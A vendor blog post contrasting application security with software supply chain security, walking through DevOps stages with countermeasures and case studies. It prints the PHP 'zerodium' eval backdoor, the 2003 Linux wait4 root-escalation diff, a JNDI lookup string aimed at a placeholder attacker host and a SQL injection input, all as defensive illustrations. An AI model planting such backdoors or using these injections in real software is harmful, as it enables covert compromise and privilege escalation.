SOFTWARE SUPPLY CHAIN

Application Security vs. Software Supply Chain Security: What's the Difference?

Mike Doyle
Head of Security Research
February 27, 2022
Mike Doyle earned a Computer Science degree in 2003, just in time to watch the post-bubble job market dry up. Handy with a bash prompt, he found work as a system admin in an attempt to edge back into development. Instead, he moved toward security consulting and penetration testing (which is what he always wanted to do anyway). Doyle believes that hard problems require elegant solutions.

TL;DR

The growing field of software supply chain security differs from traditional application security at every point where you might interact with it, and it requires different tools and techniques.


Introduction: Understanding the importance of securing software

We are witnessing an increasing trend in software supply chain attacks. Analysis by Gartner states that “by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021”. For security professionals who have worked in application security for years, it can be a false comfort to view these new threats through the same lens. It is easy to treat software supply chain vulnerabilities as if they were someone else’s web bugs, but managing risk that comes from the software supply chain requires different tools and techniques.

In this blog post we contrast software supply chain security with application security in concrete terms, showing how the two differ in the context of the DevOps process. That framing lets us describe the options you have for securing your software supply chain.

How do App Sec and Software Supply Chain Security fit in the DevOps process?

The diagram below shows which application security and software supply chain risks exist in a typical DevOps-driven software development process. The chartreuse-colored numbers 1 and 7 are application security risks: the introduction and exploitation of application vulnerabilities, respectively. The dark-gray-colored numbers 2 through 6 are software supply chain risks.

Figure 1. Application Security vs Software Supply Chain Security

Stage | Risk | Countermeasure
Plan | Architecture flaw | Threat modeling and secure design reviews
Code | Implementation bug | SAST, DAST, SBOM, Pen Test, Bug Bounty, Secrets Scanning

Table 1. [App Sec] Introducing an App Vulnerability

A typical application security vulnerability is introduced in the planning or coding phase.

Plan

Vulnerabilities created during the planning phase are typically caused by a failure to fully consider the security implications and requirements of the system. For example, failing to recognize the security implications of allowing JNDI lookups in log data can lead to surprising results, as Log4Shell demonstrated.
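
To make that concrete, here is a minimal, purely illustrative Python sketch (the header value and helper name are invented, and this is not Log4Shell exploit code) showing how attacker-controlled input headed for a log line can carry a lookup token that a lookup-enabled logger would dereference:

  # Hypothetical check: flag request values that a lookup-enabled logging
  # framework might interpret as a JNDI lookup instead of inert text.
  def contains_jndi_lookup(value: str) -> bool:
      # "${jndi:" is the prefix a vulnerable logger would try to expand.
      return "${jndi:" in value.lower()

  user_agent = "${jndi:ldap://attacker.example/a}"  # attacker-supplied header
  if contains_jndi_lookup(user_agent):
      print("refusing to log raw value; logging a sanitized placeholder instead")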

Threat modeling performed by experienced analysts can go a long way toward preventing these lapses.

Code

We can assume that the typical professional software developer doesn’t go out of their way to write insecure code unless their intent is malicious. Producing secure software takes effort. An inexperienced developer may concatenate user input into a SQL query instead of devising a parameterization strategy, or innocently reflect unsanitized data to a web browser without jumping through all the hoops to properly encode it as HTML. Even classic buffer bugs like Heartbleed take effort to avoid.
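
As a minimal sketch of that first pitfall, assuming nothing beyond Python's built-in sqlite3 module and an invented users table, here is the difference between concatenation and parameterization:

  import sqlite3

  conn = sqlite3.connect(":memory:")
  conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
  conn.execute("INSERT INTO users VALUES ('alice', 'admin')")

  user_input = "alice' OR '1'='1"  # attacker-controlled value

  # Vulnerable: concatenating user input builds a query the attacker controls.
  vulnerable_query = "SELECT role FROM users WHERE name = '" + user_input + "'"
  print(conn.execute(vulnerable_query).fetchall())  # returns rows it shouldn't

  # Safer: a parameterized query treats the input as data, never as SQL.
  safe_query = "SELECT role FROM users WHERE name = ?"
  print(conn.execute(safe_query, (user_input,)).fetchall())  # returns nothing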

The application security industry has built a wide array of countermeasures for implementation bugs. SAST, SCA, DAST, penetration testing, bug bounties, and secrets scanning tools are all geared toward identifying these defects between the time they are written and the time they reach production.
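
To give a flavor of what one of these categories automates, below is a heavily simplified secrets-scanning sketch; real scanners ship far broader rule sets plus entropy analysis, and the two patterns here are illustrative only:

  import re

  # Toy rules: an AWS-style access key ID and a generic "password = ..." assignment.
  SECRET_PATTERNS = [
      re.compile(r"AKIA[0-9A-Z]{16}"),
      re.compile(r"password\s*=\s*['\"][^'\"]+['\"]", re.IGNORECASE),
  ]

  def scan_text(text: str):
      findings = []
      for lineno, line in enumerate(text.splitlines(), start=1):
          for pattern in SECRET_PATTERNS:
              if pattern.search(line):
                  findings.append((lineno, line.strip()))
      return findings

  sample = 'aws_key = "AKIAIOSFODNN7EXAMPLE"\npassword = "hunter2"\n'
  for lineno, line in scan_text(sample):
      print(f"possible secret on line {lineno}: {line}")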

Stage | Risk | Countermeasure
Code | Malicious code injected into the product | Mandatory PR reviews without rubber stamping, identify risky code changes
Build | Malicious dependency injected into the product | Package risk scoring, identify risky code changes

Table 2. [SSC] Injecting Malicious Code or Package

Malicious code is injected by developers during the coding phase of software development. Malicious third-party packages, by contrast, are introduced, intentionally or unintentionally, when the code is built into executables and packaged for deployment.

Code

Malicious code can be inserted into source code management systems by legitimate developers or by compromised developer accounts. Finding backdoors, logic bombs, trojan horses, and the like in code is difficult to automate.

What do I mean by that? Take the PHP backdoor from March 2021. On receipt of a specific HTTP header, the backdoor uses a string sent with that header as executable PHP code:


  convert_to_string(enc);
  if (strstr(Z_STRVAL_P(enc), "zerodium")) {
    zend_try {
      zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
    } zend_end_try();
  }

Any static analysis tool that looks for command injection should flag this, because the backdoor is implemented as command injection via the function “zend_eval_string”.
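
As a toy illustration of that kind of check (not a real SAST engine, and the sink list is far from complete), a simple pattern match over added diff lines is enough to surface an eval-style sink for human review:

  import re

  # A short, illustrative list of eval-style sinks worth a human look.
  SINK_PATTERN = re.compile(r"\b(zend_eval_string|eval|exec|system|popen)\s*\(")

  def flag_eval_sinks(diff_text: str):
      for lineno, line in enumerate(diff_text.splitlines(), start=1):
          if line.startswith("+") and SINK_PATTERN.search(line):
              yield lineno, line

  diff = '+      zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS");'
  for lineno, line in flag_eval_sinks(diff):
      print(f"review added line {lineno}: {line.strip()}")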

Compare this to a Linux kernel backdoor attempt from 2003 in which the wait4 system call was modified to add this code:

  --- GOOD        2003-11-05 13:46:44.000000000 -0800
  +++ BAD 2003-11-05 13:46:53.000000000 -0800
  @@ -1111,6 +1111,8 @@
                  schedule();
                  goto repeat;
          }
  +       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
  +                       retval = -EINVAL;
          retval = -ECHILD;
   end_wait4:
          current->state = TASK_RUNNING;

Unless you are a very conscientious C programmer, this code looks like it checks to see if a few options are set and if the current user ID is zero, and if so, sets a return value to indicate an invalid condition has occurred. Since those two options should never be set at the same time, this would make sense. However, this code sets the current user’s ID to zero. That second condition in the if statement is a single-equals (‘=’) assignment operation, not a double-equals (‘==’) comparison operation. And setting your user ID to zero in the kernel is a privilege escalation to Linux’s all-powerful root user.

Static analysis would whizz right by this code. I’ve conducted penetration tests of many Unix and Linux systems and never have I written a custom program which calls arbitrary system calls with arbitrary options to see if it results in a privilege escalation.

Fortunately, the Linux kernel has many very conscientious C programmers who perform code reviews as part of a formal approval process, and who don’t merely rubber-stamp their reviews but carefully analyze changes before they make their way into the kernel. For this reason, this backdoor was never deployed.

Build

When Dominic Tarr was contacted by fellow open-source software developer “right9ctrl” asking to take over maintenance of “event-stream”, one of his several hundred projects, he said yes. Feature requests were being made to event-stream and Tarr didn’t have the bandwidth to care for a package he didn’t even use anymore. Right9ctrl infected event-stream with a backdoored dependency, and event-stream thereby infected the 3900+ packages that use it as a dependency, in a targeted attack against bitcoin wallet software.

Most organizations do not perform in-depth code reviews of third-party dependencies. Instead, package risk scoring such as OpenSSF’s Scorecard project or Black Duck’s Open Hub system can help identify immature, under-maintained, and therefore risky dependency packages.
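
As a sketch of what consuming such a score can look like, the snippet below queries the public OpenSSF Scorecard REST API for a repository; the endpoint URL and response fields are assumptions based on the project's public documentation, so verify them before relying on this:

  import json
  import urllib.request

  # Hypothetical helper: fetch a repository's OpenSSF Scorecard results.
  def scorecard(repo: str) -> dict:
      url = f"https://api.securityscorecards.dev/projects/github.com/{repo}"
      with urllib.request.urlopen(url, timeout=10) as resp:
          return json.load(resp)

  result = scorecard("expressjs/express")
  print(f"aggregate score: {result.get('score')}")
  for check in result.get("checks", []):
      print(f"{check.get('name')}: {check.get('score')}")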

In either the code or build stage you can fight this risk by identifying risky code changes. This is the space that Arnica works in. We will be announcing much more about our capabilities later.

Stage | Risk | Countermeasure
Code, Build, Test, Release | Exfiltration of code or related artifacts | Anomaly detection, excessive permission mitigation, threat intelligence

Table 3. [SSC] Exfiltrate Code

In August 2018, Snapchat accidentally released parts of its source code tree as part of its iOS app release. Mobile app packages are compressed zip files holding everything the app needs to run on a target mobile device and, frequently, lots of things it doesn’t. Snapchat accidentally copied some of its source into that zip file, which was subsequently found by a curious Snapchat user and shared on the internet.

The accidental or intentional exfiltration of code can happen at various points in the lifecycle. For Snapchat, it was in the release. Anyone with access to your code at any time can exfiltrate it. Clearly, curbing excessive permissions is key to preventing the majority of risk here. Threat intelligence can clue you in that your code has been disclosed publicly or on the dark web. Anomaly detection, and sometimes data loss prevention, can identify your code as it’s on its way out the door.
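
A toy version of that kind of anomaly detection compares each developer account's daily volume of repository reads against its own recent baseline and flags large deviations; the data source and threshold below are hypothetical:

  from statistics import mean, stdev

  # Hypothetical input: bytes of source fetched per day by one developer account.
  daily_bytes = [120_000, 95_000, 110_000, 130_000, 105_000, 9_800_000_000]

  baseline = daily_bytes[:-1]
  today = daily_bytes[-1]
  threshold = mean(baseline) + 3 * stdev(baseline)

  if today > threshold:
      print(f"anomaly: {today} bytes fetched today vs. threshold {threshold:.0f}")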

This risk encompasses the exfiltration of not just code but other software development artifacts. When Anthony Levandowski allegedly stole almost 10 gigabytes of design documentation from self-driving car pioneer Waymo to found his own company, Uber quickly bought the small company for over half a billion dollars. The civil suit was settled for 0.34% of Uber’s equity.

Fortunately for Waymo, its security systems let it observe the downloads of the design documents, and external intelligence confirmed that Uber was using proprietary features of Waymo’s design that were documented among the stolen materials.

Stage | Risk | Countermeasure
Build, Release, Deploy | Malicious code or binaries injected in the build system | Sign and validate code and binaries, dev tool hardening best practices, trusted package distribution system

Table 4. [SSC] Compromise Code Integrity

Sometimes malicious external actors will compromise IT infrastructure to inject malicious code into otherwise innocent code. This happened with the Webmin backdoor from 2019. There, the very popular UNIX administration software’s SourceForge package was manipulated to include a command injection vector in its change-password functionality, but the source and packages available from its GitHub repo were untouched. Anyone who deployed Webmin by downloading packages from SourceForge was potentially affected.

Protecting the integrity of your code is not a simple matter because of the size and complexity of your pipeline’s attack surface. Reducing that attack surface to the extent you are able is a good first step, but it’s big and complex for a reason: it has a big, complex job to do. Nonetheless, hardening configurations and minimizing the permissions for each component in the pipeline is a worthwhile exercise. Signing code and binaries early is useful, but only if those signatures are generated in secure or distributed enclaves to prevent tampering and are validated in later phases. Distributed enclaves are a novel approach: after its breach, SolarWinds experimented with running builds in parallel across redundant, distributed build systems so that a similar attacker would have to be in three places at the same time. Having a trusted package distribution system and performing software composition analysis to identify publicly known vulnerable third-party packages can also help manage this risk.
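
Here is a minimal sketch of the sign-early, validate-later idea using an Ed25519 key from the pyca/cryptography library; in practice the private key would live in an HSM or enclave rather than in the build script, and real pipelines use tooling such as Sigstore rather than hand-rolled code:

  from cryptography.hazmat.primitives.asymmetric import ed25519
  from cryptography.exceptions import InvalidSignature

  # Build stage: sign the artifact with a key kept out of the pipeline itself.
  private_key = ed25519.Ed25519PrivateKey.generate()
  public_key = private_key.public_key()

  artifact = b"contents of the built package"
  signature = private_key.sign(artifact)

  # Deploy stage: refuse to ship anything whose signature does not verify.
  tampered = artifact + b" plus an injected backdoor"
  try:
      public_key.verify(signature, tampered)
      print("signature ok, deploying")
  except InvalidSignature:
      print("artifact was modified after signing; aborting deploy")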

Stage | Risk | Countermeasure
Deploy | Credential reuse, transitive trust issues | Reused credential detection, separate pipelines per environment

Table 5. [SSC] Cross-environment Compromise

Cross-environment compromise occurs when authorization to one environment leads to unwanted authorization to another. One simple way this can happen is through the reuse of credentials across different environments. Another is through transitive trust issues in infrastructure, for example, deploying one service into the network or pod of another service.

Centralized secrets managers can prevent the former risk from occurring. Separate pipelines—treating each environment as a different tenant—can help with the latter.
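
A sketch of reused-credential detection: hash the secret values configured for each environment and flag any digest that shows up in more than one. The environment names and secret values below are made up:

  import hashlib
  from collections import defaultdict

  # Hypothetical secret stores, keyed by environment.
  env_secrets = {
      "dev":  {"DB_PASSWORD": "s3cret-dev", "API_TOKEN": "abc123"},
      "prod": {"DB_PASSWORD": "s3cret-dev", "API_TOKEN": "zzz999"},  # reused!
  }

  seen = defaultdict(list)
  for env, secrets in env_secrets.items():
      for name, value in secrets.items():
          digest = hashlib.sha256(value.encode()).hexdigest()
          seen[digest].append((env, name))

  for digest, locations in seen.items():
      if len({env for env, _ in locations}) > 1:
          print(f"credential reused across environments: {locations}")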

Stage | Risk | Countermeasure
Operate | Backdoor access, unauthorized command execution, data loss, ransomware attacks, etc. | API threat protection on SaaS products, XDR (effective only sometimes)

Table 6. [SSC] Utilize Backdoor or Malicious Software

We’ve seen the many different ways software supply chain vulnerabilities can be exploited throughout the DevOps process. Sometimes they are exploited in production as well. This happened in the Siemens logic bomb attack, wherein a developer allegedly created self-destructing Excel macros for the purpose of garnering additional support contracts.

For software products that run on customer premises, that means customer production, as with the SolarWinds cyberattack.

If you have custom backdoors being accessed in production, there’s not a lot you can do at this point. XDR tools might detect especially loud network anomalies. Any other internal controls contributing to your defense-in-depth strategy can help. For example, API threat protection on SaaS products can identify abnormal API calls; if your intruder is accessing APIs as part of their attack campaign, this control can help.
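
As a toy illustration of what “abnormal API calls” can mean, the sketch below builds a per-client profile of the endpoints it normally touches and flags calls outside that profile; the client ID and endpoints are invented:

  # Hypothetical history of API calls per client, gathered during normal operation.
  baseline_profile = {
      "service-account-42": {"/v1/orders", "/v1/orders/{id}", "/v1/healthz"},
  }

  # New traffic observed in production.
  new_calls = [
      ("service-account-42", "/v1/orders"),
      ("service-account-42", "/v1/admin/export-all-users"),  # never seen before
  ]

  for client, endpoint in new_calls:
      known = baseline_profile.get(client, set())
      if endpoint not in known:
          print(f"alert: {client} called unfamiliar endpoint {endpoint}")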

Stage | Risk | Countermeasure
Operate | Hackers exploit application vulnerabilities | API threat protection, WAFs, XDR

Table 7. [App Sec] Exploiting an App Vulnerability

Finally, we come full circle on the application security side. Operations is the only phase where application security vulnerabilities are exploited.

There are many productized countermeasures in this space, such as API threat protection, web application firewalls, and extended detection and response (XDR) systems.

Other notable differences

Notable Difference | AppSec Attacks | SSC Attacks
Who typically performs the attack | Malicious external hackers | Malicious or compromised code contributors
What is the attack surface | Deployed running code | Source code, third-party packages, development toolchain, identity providers, productivity tools
Is the vulnerability accidental or intentional | Accidental | Intentional
How does the attacker “get in” | By taking advantage of vulnerabilities in the code and architecture of software | By accessing backdoors they put in the code, by injecting malicious code to act on their behalf, or by already being an insider

Table 8. Notable attack differences

Summary

Reducing the risk of software supply chain attacks requires security activities at many places in the DevOps process. While there might be a lot of manual work to do today, software supply chain tools are maturing as awareness grows throughout the DevSecOps industry. Don’t conflate software supply chain security with application security. Join our journey at Arnica.

